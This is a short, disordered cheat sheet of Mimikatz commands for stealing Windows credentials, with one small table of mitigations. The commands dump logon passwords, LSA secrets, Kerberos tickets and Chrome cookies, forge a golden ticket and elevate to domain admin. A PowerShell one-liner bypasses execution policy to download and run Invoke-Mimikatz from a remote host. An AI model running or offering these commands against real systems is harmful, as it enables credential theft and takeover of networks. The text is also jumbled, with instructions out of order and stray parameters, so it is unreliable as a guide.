dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
| Attack | Mitigation | |--------|-------------| | Credential dumping | Enable LSA Protection (RunAsPPL), Credential Guard | | WDigest cleartext | Disable WDigest (reg: UseLogonCredential = 0) | | Pass-the-Hash | Require Kerberos, restrict admin logins, use Protected Users group | | Golden Ticket | Regularly rotate KRBTGT password (twice), use domain controllers as RODC | | Pass-the-Ticket | Enable Kerberos Armoring (FAST), use Protected Users | | LSASS access | Block SeDebugPrivilege for non-admins, enable Defender ASR rules |
Limited success; requires reboot to disable normally. Use minidump approach instead. mimikatz commands
kerberos::golden /user:User /domain:contoso.com /sid:S-1-5-21-... /target:web.contoso.com /service:HTTP /rc4:hash /ptt
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit /target:web
Mimikatz requires (admin/System) and often SeDebugPrivilege . Run these first:
lsadump::secrets
powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://.../Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
sekurlsa::tickets
token::elevate /domainadmin process::start cmd.exe